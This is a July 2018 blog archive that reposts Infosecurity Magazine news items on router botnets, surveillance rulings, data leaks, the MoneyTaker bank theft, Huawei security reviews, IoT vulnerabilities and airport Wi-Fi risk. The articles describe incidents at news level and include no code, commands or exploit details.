Intelligent Connections. Recruiting Integrity.
Call Us: 415-510-2973

Archive for July 2018

Attackers Go After GPON Routers, Again

Attackers Go After GPON Routers, Again

Using automated analysis via a Python script, researchers at eSentire observed an increase in exploitation attempts on gigabit passive optical network (GPON) routers. Though the router attacks had declined since the surge reported back in June, the researchers identified a new, coordinated weaponization campaign targeting D-Link routers on 20 July.

The company reported a botnet recruitment campaign being launched and saw a surge of exploit attempts from over 3,000 different source IPs, introducing a variation of the OS command injection attack against the 2750B D-Link router.

“A sample of packets from various source IPs involved in this event pointed to a single C2 server hosting malware that appeared. VirusTotal results for the malware indicated similarities with the Mirai botnet. Variants of Mirai code have been spotted in the Satori botnet,” researchers wrote.

While none of these exploits appeared to be successful in corporate environments, likely because they lack consumer-grade routers, “it is unknown whether this attack had any success on home networks where these devices are more likely to be deployed. A successful recruitment campaign has the potential to arm the associated threat actor(s) with DDoS artillery and facilitate espionage of private browsing habits,” researchers wrote in a blog post.  

The mass number of attacks is indicative of a potential botnet and researchers suggested that the botnets built using the compromised routers could be offered as a service, adding “It is not uncommon for botnet controllers to attempt to increase the number of devices in their botnet by using tactics similar to this. The infected devices can then be used to launch additional attacks such as distributing malicious content or launching DDoS attacks.”

In addition, the company also released an advisory on the topic and noted that only Dasan routers using ZIND-GPON-25xx firmware and some H650 series GPON are vulnerable, and that there are no official patches at this time. Researchers are continuing to monitor the associated signatures.

Source: Information Security Magazine

Foreign Secretaries Illegally Handed GCHQ Data Request Powers

Foreign Secretaries Illegally Handed GCHQ Data Request Powers

A new Investigatory Powers Tribunal (IPT) ruling has exposed the inadequacy of current oversight mechanisms meant to keep the surveillance state in check, and the willingness of telecoms firms to hand over customers’ data to GCHQ, according to a leading rights group.

Privacy International (PI) claimed victory today after a tenacious legal investigation which had forced GCHQ to make “substantial corrections” to evidence it originally gave to the court mid-case.

Its job was made harder by the fact that the IPT relies heavily on closed hearings where claimants like PI can’t see or challenge evidence presented by the government, and only progressed after the “extraordinary” decision was taken to allow the group to cross-examine a GCHQ witness.

The IPT’s decision held that successive foreign secretaries unlawfully delegated to GCHQ decisions about what data to acquire from telecommunication companies — effectively rendering 10 years’ worth of secretly collected data illegal.

"In theory the agency [GCHQ] could have used the general form of such directions to impose on the CSP a requirement to produce communications data which extended beyond the scope of any data requirement which had been sanctioned by the Foreign Secretary,” the IPT apparently ruled.

The judgement also casts an unforgiving light on the telcos themselves, which appeared to have handed over highly sensitive data on their customers without question in response to verbal requests.

“The foreign secretary was supposed to protect access to our data by personally authorizing what is necessary and proportionate for telecommunications companies to provide to the agencies. The way that these directions were drafted risked nullifying that safeguard, by delegating that power to GCHQ — a violation that went undetected by the system of commissioners for years and was seemingly consented to by all of the telecommunications companies affected,” argued PI solicitor, Mille Graham Wood. 

“It is proof positive of the inadequacy of the historic oversight system; the complicity of telecommunications companies who instead of checking if requests were lawful, just handed over customers' personal data as long as their cooperation was kept secret; and the scale of the task facing the new investigatory powers commissioner, Sir Adrian Fulford.”

Source: Information Security Magazine

Supplier Error Leaks Decade of Data from Carmakers

Supplier Error Leaks Decade of Data from Carmakers

A security error by a third-party supplier has left over 100 manufacturing firms including several big-name carmakers red-faced after sensitive documents were exposed.

Over 150GB of data was left on a publicly accessible server by Level One Robotics, a supplier to Tier 1 automotive firms including VW, Chrysler, Ford, Toyota, GM and Tesla, and German manufacturing giant ThyssenKrupp.

The infrastructure found to be responsible was an exposed rsync server unrestricted by IP or user, with the data located therein downloadable to any rsync client that connected to the rsync port, according to Upguard.

“The 157GBs of exposed data include over 10 years of assembly line schematics, factory floor plans and layouts, robotic configurations and documentation, ID badge request forms, VPN access request forms, and ironically, non-disclosure agreements, detailing the sensitivity of the exposed information,” the security vendor explained.

“Not all types of information were discovered for all customers, but each customer contained some data of these kinds. Also included are personal details of some Level One employees, including scans of driver’s licenses and passports, and Level One business data, including invoices, contracts, and bank account details.”

Even worse, the rsync server was publicly writable at the time the privacy snafu was discovered, meaning a malicious outsider could have altered the documents stored there or even uploaded malware.

Level One was praised for reacting quickly to the incident once notified by Upguard. However, organizations were urged to do more to secure their supply chains.

“Organizations and their vendors must have standardized deployment processes that create and maintain assets securely, reducing the likelihood of a data incident,” said Upguard.

“If this security is not built into the processes themselves, there will always be misconfigurations that slip through and lead to data exposure. They must also have an exposure response plan, so that when they are affected, they can act quickly to remediate, as Level One did in this case.”

Source: Information Security Magazine

Has GDPR Impacted Insider Threats?

Has GDPR Impacted Insider Threats?

According to new research from Clearswift, the introduction of GDPR has led to a slight drop in insider threats in both the UK and Germany. Survey respondents said that insider threats make up 65% of reported incidents in 2018, compared to 73% last year. German companies reported similar declines, with insider error incidents at 75% this year, down from 80% last year.

The research surveyed 400 senior IT decision makers from global organizations with more than 1,000 employees and found that 38% of IT security incidents occur as a direct result of their employees’ actions, with 75% of all incidents originating from their extended enterprise, which includes employees, customers and suppliers. Former employees represent 13% of cybersecurity incidents for the participating organizations.

According to this year’s survey, despite the reality that internal threats are the greatest risk to most organizations, employees believe that the majority of incidents (62%) are accidental, which is only a slight decrease from 65% in 2017.

“Although there’s a slight decrease in numbers in the EMEA region, the results once again highlight the insider threat as being the chief source of cybersecurity incidents,” Dr. Guy Bunker, SVP of products at Clearswift, said in a press release. “Three-quarters of incidents are still coming from within the business and its extended enterprise, far greater than the threat from external hackers. Businesses need to shift the focus inwards."

“Organizations need to have a process for tracking the flow of information in the business and have a clear view on who is accessing it and when," Bunker continued. "Businesses need to also ensure that employees ‘buy into’ the idea that data security is now a critical issue for the business. Educating them on the value of data, on different forms of data, what is shareable and what's not, is crucial to a successful cybersecurity strategy."

Given that the percentage changes are so slight, Ben Herzberg, director of threat research at Imperva, said that the minimal decline reinforces the notion that companies should not assume that their internal network is safe from threats.

“I’m not sure if GDPR is the cause of the change in the statistics gathered, but with or without GDPR, it’s important for organizations to know exactly where they store their data, and be accountable for it.”

Source: Information Security Magazine

Who Are ComplyRight's Security Employees?

Who Are ComplyRight's Security Employees?

The website of human resources firm ComplyRight was reportedly breached and sensitive data compromised, according to KrebsonSecurity. In addition to tax forms from thousands of the company’s clients, other sensitive information accessed in the breach included names, addresses, phone numbers, email addresses and Social Security numbers.

As part of his investigation, Krebs reported that he searched ComplyRight employee profiles on LinkedIn in an effort to reach members of the security department, yet he was unable to find anyone whose job title was related to security. He also noted that the company had no current listing for security job openings.

“The fact that the company touts its security prowess, yet Brian Krebs couldn’t identify a single employee with a security title, is deeply concerning – and just another reason for consumers to question their trust in digital businesses,” said Jeannie Warner, security manager at WhiteHat Security.

“Every single company that touches sensitive data needs to make security a consistent, top-of-mind concern. And any company offering software as a service should have an obligation to perform the strictest security tests against vulnerable avenues into client networks: APIs, network connections, mobile apps, websites, databases," Warner said. "Interestingly, in a check on its website, it is still not advertising anyone in IT security, nor is security mentioned in the requirements for digital product hires.”

According to WhiteHat Security research, a number of web applications remain "always vulnerable" and susceptible to attack on a daily basis. “Despite the fact that web applications often house sensitive consumer data, they are often forgotten when it comes to implementing security measures – making them an easy target for hackers, who can exploit them and gain access to back-end corporate databases,” she said.

As a human resources firm, ComplyRight handles forms overflowing with personally identifiable information, such as 1099s and W-2s. While the size of the hack isn’t known yet, the company disclosed that it first learned of the incident in late May 2018, at which point it disabled the platform and remediated the issue on the website.

“In consultation with third-party forensic cybersecurity experts, we took swift action to secure the data of our partners, business customers and the individuals potentially impacted,” ComplyRight wrote in its incident notice. The company also reported that it initiated a through communication plan to alert those individuals potentially affected by the breach, which the company said is less than 10% of those who have prepared tax forms on the web platform.

Source: Information Security Magazine

Rosenstein Warns Russia Is Only One Tree in Forest

Rosenstein Warns Russia Is Only One Tree in Forest

In the closing session of the first full day of the 2018 Aspen Security Forum, Deputy Attorney General Rod Rosenstein warned not only of increased threats from Russian influence operations but also of the additional global cyber-threats from other nation-states.

Sharing key points from the Justice Department’s new cyber-digital task force report, Rosenstein said that Russian interference in the 2016 presidential election was “just one tree in a growing forest,” according to The Hill.

Affirming that Russia is not the only foreign adversary targeting the US with cyber-threats, Rosenstein’s comments come only days after The New York Times reported that a "besieged Trump" appeared to be ad-libbing when he said that foreign meddling “could be other people also…a lot of people out there.”

During his presentation, Confronting Global Cyber Threats, which followed earlier sessions Defending Democratic Institutions: Election 2018 and Beyond and Securing the Homeland, Rosenstein reportedly warned, “These actions are persistent, they’re pervasive, they are meant to undermine democracy on a daily basis – regardless of whether it is election time or not.”

Combating the advanced, persistent threats from different nation-state actors, including North Korea, China and Iran, is at the root of the report Rosenstein referenced in yesterday’s talk.

“Computer intrusions, cybercrime schemes and the covert misuse of digital infrastructure have bankrupted firms, destroyed billions of dollars in investments and helped hostile foreign governments launch influence operations designed to undermine fundamental American institutions,” the report said.

Technology’s rapid advancement has empowered malicious foreign actors to reach “unprecedented numbers of Americans covertly and without setting foot on U.S. soil. Fabricated news stories and sensational headlines like those sometimes found on social media platforms are just the latest iteration of a practice foreign adversaries have long employed in an effort to discredit and undermine individuals and organizations in the United States,” according to the report.

Rosenstein’s remarks were part of a panel moderated by David Sanger, chief Washington correspondent at The New York Times. Panel members included Thomas Bossert, former assistant to the president for Homeland Security and Counterterrorism; Greg Clark, Symantec’s CEO; and Lisa Monaco, former assistant to the president for Homeland Security and Counterterrorism.

Source: Information Security Magazine

MoneyTaker Grabs $1m from PIR Bank

MoneyTaker Grabs $1m from PIR Bank

Hacker group, MoneyTaker, stole $1m from Russian bank PIR, transferring the money to 17 accounts at other major Russian banks and before cashing out. Group-IB were hired to respond to the incident and limit the damage, and it is thought that the withdrawal of the stolen funds means most of the money is lost to PIR Bank.

Group-IB confirmed that the attack on PIR Bank started in late May 2018, with the hackers gaining access to the bank by compromising a router used by one of the bank's regional branches. In a press release, the company said: "The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks.

“Moreover, the criminals left some so-called ‘reverse shells’, programs that connected the hackers’ servers from the bank’s network and waited for new commands to conduct new attacks and gain the access to the network. During incident response, this was detected by Group-IB employees and removed by the bank’s sysadmins.” 

Back in 2017, Group-IB confirmed that 20 companies across the globe had already fallen victim to the hacking group. Conducting successful attacks on financial institutions and legal firms in the USA, UK, and Russia, the group had been primarily targetting card processing systems, including the AWS CBR (Russian Interbank System) and SWIFT (US). 

The first attack by MoneyTaker was recorded in spring 2016, when they stole money from a US bank after gaining access to the card processing system (FirstData’s STAR processing system). After that, the hackers did not conduct attacks for almost four months and only attacked banks in Russia in September 2016. In these instances, its target was AWS CBR, the Russian interbank transfer system. In general, in 2016, Group-IB recorded 10 MoneyTaker attacks against organisations in the U.S., UK and Russia. Since 2017, the geography of their attacks has shrunk to Russia and the US. In 2018, Group-IB tracked two MoneyTaker attacks in Russia.

According to a blog on the company's website, MoneyTaker constantly changes its tools and tactics to bypass anti-virus and traditional security solutions. Most importantly, they carefully eliminate their traces after completing their operations, resulting in the group going largely unnoticed. The group has been active since around spring 2016 when they stole money from a US bank after gaining access to the card processing system. 

“During the incident, Group-IB specialists established the source of the attack, built a chain of events, and isolated the problem as soon as it was feasible," Olga Kolosova, Chairperson of the Management Board, PIR Bank LLC. "At the moment, the bank is operating normally, all Group-IB recommendations are applied and will be applied to the bank’s operations in the future in order to prevent new similar incidents.”

Source: Information Security Magazine

UK Puts Huawei on the Naughty Step for Security Issues

UK Puts Huawei on the Naughty Step for Security Issues

A report by Huawei's Cybersecurity Evaluation Centre (HCSEC) has found that the company's products, which are deployed or are contracted to be deployed in the UK, have underlying engineering issues.

Addressed to the UK National Security Advisor, HCSEC Oversight Board's fourth annual report explained that there were still concerns regarding the company broadband and mobile infrastructure products, referring to a security critical third party software used in a variety of products which was "not subject to sufficient control."

"There have been a number of detailed technical discussions between Huawei R&D and HCSEC, some including National Council Security Centre," said the report. "These discussions are working towards a full understanding of the problem, a short-term mitigation plan and a more strategic fix for the underlying cause of the problem.

"However, there is a significant risk in the UK telecoms infrastructure if Huawei and the operators are unable to support these boards long-term."

According to the BBC, the HCSEC was set up in 2010 in response to concerns that BT and others' use of Huawei's equipment could pose a threat. The body is overseen by UK security officials, including GCHQ.

Prior to this report, the previous three had concluded that any risks posed to the UK's national security "had been mitigated." However, in this latest report, the HCSEC had found two areas of concern; the building of consistent binary code and insufficient management of third-party software.

In other countries such as the US, Chinese companies such as Huawei and ZTE have been banned, most recently from retail stories on US military bases. In Australia, there is also talk of Huawei being banned from its new 5G network due to security concerns.

In April 2018, the Wall Street Journal reported that the company was under US criminal investigation for illegal Iran sales, violating export sanctions.

In a statement, Huawei said: "The oversight board has identified some areas for improvement in our engineering processes. We are grateful for this feedback and committed to addressing these issues.”

Source: Information Security Magazine

Vulnerable IoT Vacuums, DVRs Put Homes at Risk

Vulnerable IoT Vacuums, DVRs Put Homes at Risk

The internet of things (IoT) has seen a string of vulnerabilities across multiple devices, the latest of which are new vulnerabilities in Dongguan Diqee 360 robotic vacuum cleaners, which could allow cybercriminals to eavesdrop, perform video surveillance and steal private data, according Positive Technologies.

Researchers Leonid Krolle and Georgy Zaytsev uncovered the Dongguan Diqee 360 security issues found on vacuums, which most likely affect not only those made by the company but those sold under other brand names as well. The devices affected by vulnerability CVE-2018-10987 are at risk of an authenticated remote code execution, potentially allowing an attacker to send a User Datagram Protocol (UDP) packet enabling them to execute commands on the vacuum cleaner as root.

A second vulnerability, CVE-2018-10988, involves a microSD card that reportedly could be used to exploit weaknesses in the vacuum's update mechanism. The researchers said that these vulnerabilities may also affect other IoT devices using the same video modules as Dongguan Diqee 360 vacuum cleaners. Such devices include outdoor surveillance cameras, DVRs, and smart doorbells.

That an authenticated attacker can gain access to the device in itself isn’t a major issue. “The difference is that this vacuum cleaner does not simply wander around the house, cleaning,” said Yotam Gutman, VP of marketing, SecuriThings. “It also serves as a mobile surveillance bot, with both day and night capabilities. Imagine that someone can get access to the device and watch the video feed, without the owners even realizing it. Even worse – someone can program the route of the device to drive around the house, filming the inside, which is very similar to what reconnaissance drones do in 'Star Wars' or other sci-fi movies."

"This is another incident/vulnerability that demonstrates just how hackable cheap connected devices are. Buyers of vacuum robots should really think if they want their nice little R2-D2-like helper to have reconnaissance capabilities.”

In related news, another vulnerability (CVE-2013-6117) has resurfaced despite being nearly five years old. Login passwords for tens of thousands of Dahua DVR devices were reportedly cached and indexed inside search results returned by IoT search engine ZoomEye.

Commenting on Twitter about the vulnerability, Ankit Anubhav, principal researcher at NewSky Security, wrote, “The attackers do not even need to write code to connect to the port as they can login to public scanner like ZoomEye which store the output of requests in their website and dump it.

“A new low has been achieved in the ease of hacking IoT devices. One does not even need to connect to the Dahua devices to get the credentials.”

Source: Information Security Magazine

Attention Airline Passengers, Your Data Is at Risk

Attention Airline Passengers, Your Data Is at Risk

A new report, Attention All Passengers: Airport Networks Are Putting Your Devices & Cloud Apps at Severe Risk, released by Coronet found that some of America’s airports are cyber-insecure.

The data collected identified San Diego International Airport, John Wayne Airport-Orange County (CA) International Airport and Houston’s William P. Hobby International Airport as lagging in cybersecurity.

Over the course of five months, vast amounts of data on device vulnerabilities and Wi-Fi network risks were collected from more than 250,000 consumer and corporate endpoints that traveled through America’s 45 busiest airports.

After extensive analysis, the data was compile into an Airport Threat Score, which identified not only the most cyber-insecure airports but also the least vulnerable. Chicago-Midway International, Raleigh-Durham International and Nashville International ranked top of the list for low vulnerability.

According to the report, business travelers are at heightened risk of unintentionally facilitating unauthorized device access, data theft and malware/ransomware spread across their endpoints. Once devices are infected, the integrity and confidentiality of the employers’ essential cloud-based work apps, such as G Suite, Dropbox and Office 365, are jeopardized.

The data suggested that all flyers are at an elevated risk of connecting to unencrypted, unsecured or improperly configured networks, which can prompt identity theft, financial fraud, and personal files and picture theft.

“Far too many U.S. airports have sacrificed the security of their Wi-Fi networks for consumer convenience,” said Dror Liwer, Coronet’s founder and CISO.

“As a result, business travelers in particular put not just their devices, but their company’s entire digital infrastructure at risk every time they connect to Wi-Fi that is unencrypted, unsecured or improperly configured," said Liwer. "Until such time when airports take responsibility and improve their cybersecurity posture, the accountability is on each individual flyer to be aware of the risks and take the appropriate steps to minimize the danger.”

Source: Information Security Magazine